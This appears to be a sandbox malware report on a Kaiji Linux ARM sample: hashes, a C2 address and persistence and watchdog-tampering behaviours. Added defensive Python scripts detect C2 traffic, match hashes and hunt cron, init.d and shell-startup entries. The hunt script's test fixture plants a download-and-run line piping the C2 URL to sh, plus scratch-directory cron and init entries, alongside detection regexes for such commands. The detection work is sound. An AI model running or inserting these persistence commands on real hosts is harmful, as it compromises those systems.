General

  • Target

    linux_arm7

  • Size

    2.0MB

  • Sample

    250420-pajw2svtcs

  • MD5

    d4d36b5623331b7ae8dd841a740c4a54

  • SHA1

    608dda01f20f92bc967ad12d30d6d2a535c3e30f

  • SHA256

    5fa8b347636e9f92dc608623f80997fc260a24d9ac18118346e920c852291764

  • SHA512

    03abb5b9338d80f4bcc8e829c0b42758121e18085e049eecca31b5096134d1ed7b0905559cd1530ae9fc3c990cd43c5bd2bc8051b1d550bff10237c0340491f6

  • SSDEEP

    24576:H01f0dr8LVGxdIbrL4JCiDvJCzJI2hFvIw2c1lmsYhc0rJKyHjSY52dVh2HviGCM:AAibWT2xp2T1

Malware Config

Extracted

  • Family

    kaiji

  • C2

    103.45.68.160:888
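The C2 endpoint and the file digests above are the indicators most analysts will sweep for first. The script below is an added example, not part of the Triage report: it parses Zeek conn.log records (the log excerpt is constructed, not captured traffic; the C2 address, port and hashes are the report's) and reports every host that tried to reach the C2, plus a helper that compares a file's digests against the sample.

```python
import hashlib

# Indicators taken from the report above.
C2_IP = "103.45.68.160"
C2_PORT = 888
SAMPLE_HASHES = {
    "md5": "d4d36b5623331b7ae8dd841a740c4a54",
    "sha1": "608dda01f20f92bc967ad12d30d6d2a535c3e30f",
    "sha256": "5fa8b347636e9f92dc608623f80997fc260a24d9ac18118346e920c852291764",
}

# Constructed Zeek conn.log excerpt (not real traffic). Zeek TSV logs carry the
# column names in a '#fields' line, followed by '#types'; both start with '#'.
CONN_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tconn_state\torig_bytes\tresp_bytes
#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring\tcount\tcount
1745130001.1\tCa1\t192.168.1.20\t51234\t93.184.216.34\t443\ttcp\tSF\t512\t4096
1745130002.7\tCb2\t192.168.1.42\t40021\t103.45.68.160\t888\ttcp\tS0\t0\t0
1745130003.2\tCb3\t192.168.1.42\t40022\t103.45.68.160\t888\ttcp\tSF\t144\t96
1745130004.9\tCc4\t192.168.1.20\t51235\t103.45.68.160\t80\ttcp\tSF\t200\t1000
"""


def parse_zeek_tsv(text):
    """Yield one dict per record, using the '#fields' header for the keys."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))


def c2_connections(text, c2_ip=C2_IP, c2_port=C2_PORT):
    """(uid, orig_h, conn_state) for every flow to the C2 ip:port pair.

    conn_state S0 means the SYN got no reply: the C2 may be down, but the host
    still tried to reach it, which is the fact that matters for containment.
    The port is compared too, so unrelated traffic to the same IP is not flagged.
    """
    return [
        (r["uid"], r["id.orig_h"], r["conn_state"])
        for r in parse_zeek_tsv(text)
        if r["id.resp_h"] == c2_ip and r["id.resp_p"] == str(c2_port)
    ]


def infected_hosts(text):
    """Distinct internal hosts that attempted C2 contact."""
    return sorted({orig for _, orig, _ in c2_connections(text)})


def digest_file(path):
    """md5/sha1/sha256 of a file on disk, read in 1 MiB chunks."""
    hs = {algo: hashlib.new(algo) for algo in SAMPLE_HASHES}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            for h in hs.values():
                h.update(chunk)
    return {algo: h.hexdigest() for algo, h in hs.items()}


def matching_algorithms(digests):
    """Names of the supplied digests that equal the report's sample (case-insensitive).

    Key on sha256 where you can; md5 is kept only because many feeds still use it.
    """
    return sorted(algo for algo, h in digests.items() if SAMPLE_HASHES.get(algo) == h.lower())


if __name__ == "__main__":
    for uid, host, state in c2_connections(CONN_LOG):
        print(f"{host} -> {C2_IP}:{C2_PORT} uid={uid} state={state}")
    print("hosts to isolate:", infected_hosts(CONN_LOG))
```

Run `digest_file()` on a suspect binary and pass the result to `matching_algorithms()`; an empty list means the file is not this exact sample, not that it is clean, since a rebuilt Kaiji binary will have different hashes.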

Targets

    • Target

      linux_arm7

    • Kaiji

      Kaiji payload

    • Kaiji family

    • Executes dropped EXE

    • Modifies Watchdog functionality

      The Linux watchdog (/dev/watchdog) reboots a device that stops responding. Malware such as Mirai disables it so that a busy or hung infected device is not rebooted, which would otherwise clear the infection until the next compromise.

    • Creates/modifies Cron job

      Cron runs commands on a schedule and is commonly abused for persistence: a job that periodically re-launches the payload survives the process being killed and, for system crontabs, a reboot.

    • Creates/modifies environment variables

      Changing environment variables (for example PATH or LD_PRELOAD set from a shell startup file) can make later commands run or load attacker-controlled code. On its own this is a weak indicator; read it together with the shell-startup and init.d findings in this list.

    • Enumerates running processes

      Discovers information about the processes currently running on the system (process discovery).

    • Modifies init.d

      Adds or modifies a System V init script under /etc/init.d, most likely so the payload is started again at boot.

    • Write file to user bin folder

    • Modifies Bash startup script
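The persistence and evasion behaviours listed above (cron job, init.d script, Bash startup script, a file dropped into a bin folder, a tampered watchdog) all leave traces a responder can look for on a live host or a mounted disk image. The hunt script below is an added example and is not part of the Triage report or of the Kaiji code: it scans the usual cron, init.d and shell-startup locations for entries that execute from scratch directories, download-and-run, or reference the report's C2 address, and walks proc/ for processes whose executable lives in a scratch directory or was deleted, or that hold /dev/watchdog open. The demo host image it builds is constructed; the file names in it are invented and are not claims about what this sample writes.

```python
import os
import re
import tempfile

C2_IP = "103.45.68.160"  # from the report

# Locations an init script, cron job or shell profile should not normally execute from.
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
SCRATCH_EXEC = re.compile(r"(?:^|[\s;&|(])(?:/tmp|/dev/shm|/var/tmp)/\S+")
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")

# Paths are relative to a root so a mounted image can be scanned as easily as "/".
CRON_PATHS = ("etc/crontab", "etc/cron.d", "var/spool/cron")
INITD_PATHS = ("etc/init.d",)
SHELL_STARTUP = ("etc/profile", "etc/bash.bashrc", "root/.bashrc", "root/.profile")


def _files(root, rel):
    path = os.path.join(root, rel)
    if os.path.isfile(path):
        yield path
    elif os.path.isdir(path):
        for d, _, names in os.walk(path):
            for n in names:
                yield os.path.join(d, n)


def suspicious_lines(path, kind):
    """Flag non-comment lines that run from scratch dirs, download-and-run, or mention the C2."""
    try:
        with open(path, errors="replace") as fh:
            lines = fh.read().splitlines()
    except OSError:
        return []
    out = []
    for n, line in enumerate(lines, 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if SCRATCH_EXEC.search(s) or DOWNLOAD_EXEC.search(s) or C2_IP in s:
            out.append((kind, path, n, s))
    return out


def suspicious_processes(root):
    """Walk proc/<pid>: flag exe links into scratch dirs or '(deleted)', and open watchdog handles."""
    out = []
    proc = os.path.join(root, "proc")
    if not os.path.isdir(proc):
        return out
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        base = os.path.join(proc, pid)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:  # kernel thread, or we lack permission
            exe = ""
        if exe.startswith(SCRATCH_DIRS) or exe.endswith("(deleted)"):
            out.append(("process", pid, exe))
        fd_dir = os.path.join(base, "fd")
        if os.path.isdir(fd_dir):
            for fd in os.listdir(fd_dir):
                try:
                    target = os.readlink(os.path.join(fd_dir, fd))
                except OSError:
                    continue
                if target.startswith("/dev/watchdog"):
                    out.append(("watchdog", pid, f"{exe or '?'} holds {target}"))
    return out


def hunt(root="/"):
    findings = []
    for kind, rels in (("cron", CRON_PATHS), ("init.d", INITD_PATHS), ("shell-startup", SHELL_STARTUP)):
        for rel in rels:
            for path in _files(root, rel):
                findings.extend(suspicious_lines(path, kind))
    findings.extend(suspicious_processes(root))
    return findings


def build_demo_root():
    """Constructed host image: one benign entry per location plus one hostile entry each."""
    root = tempfile.mkdtemp(prefix="kaiji-hunt-")

    def put(rel, text):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(text)

    put("etc/crontab", "# m h dom mon dow user command\n17 * * * * root cd / && run-parts /etc/cron.hourly\n")
    put("etc/cron.d/netupd", "*/5 * * * * root /tmp/.x/netupd >/dev/null 2>&1\n")  # invented name
    put("etc/init.d/ssh", "#!/bin/sh\n/usr/sbin/sshd\n")
    put("etc/init.d/netupd", "#!/bin/sh\n/dev/shm/.netupd &\n")  # invented name
    put("root/.bashrc", f"alias ll='ls -l'\ncurl -s http://{C2_IP}:888/x | sh\n")
    os.makedirs(os.path.join(root, "proc/1/fd"))
    os.symlink("/sbin/init", os.path.join(root, "proc/1/exe"))
    os.makedirs(os.path.join(root, "proc/4242/fd"))
    os.symlink("/tmp/.x/netupd (deleted)", os.path.join(root, "proc/4242/exe"))
    os.symlink("/dev/watchdog", os.path.join(root, "proc/4242/fd/5"))
    return root


if __name__ == "__main__":
    for finding in hunt(build_demo_root()):
        print(finding)
```

Run `hunt("/")` as root on a live host, or `hunt("/mnt/image")` on a mounted disk; the proc/ checks only apply to a live host. A process that holds /dev/watchdog open without being the system's own watchdog daemon is what the "Modifies Watchdog functionality" signature looks like from the inside.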

MITRE ATT&CK Enterprise v16
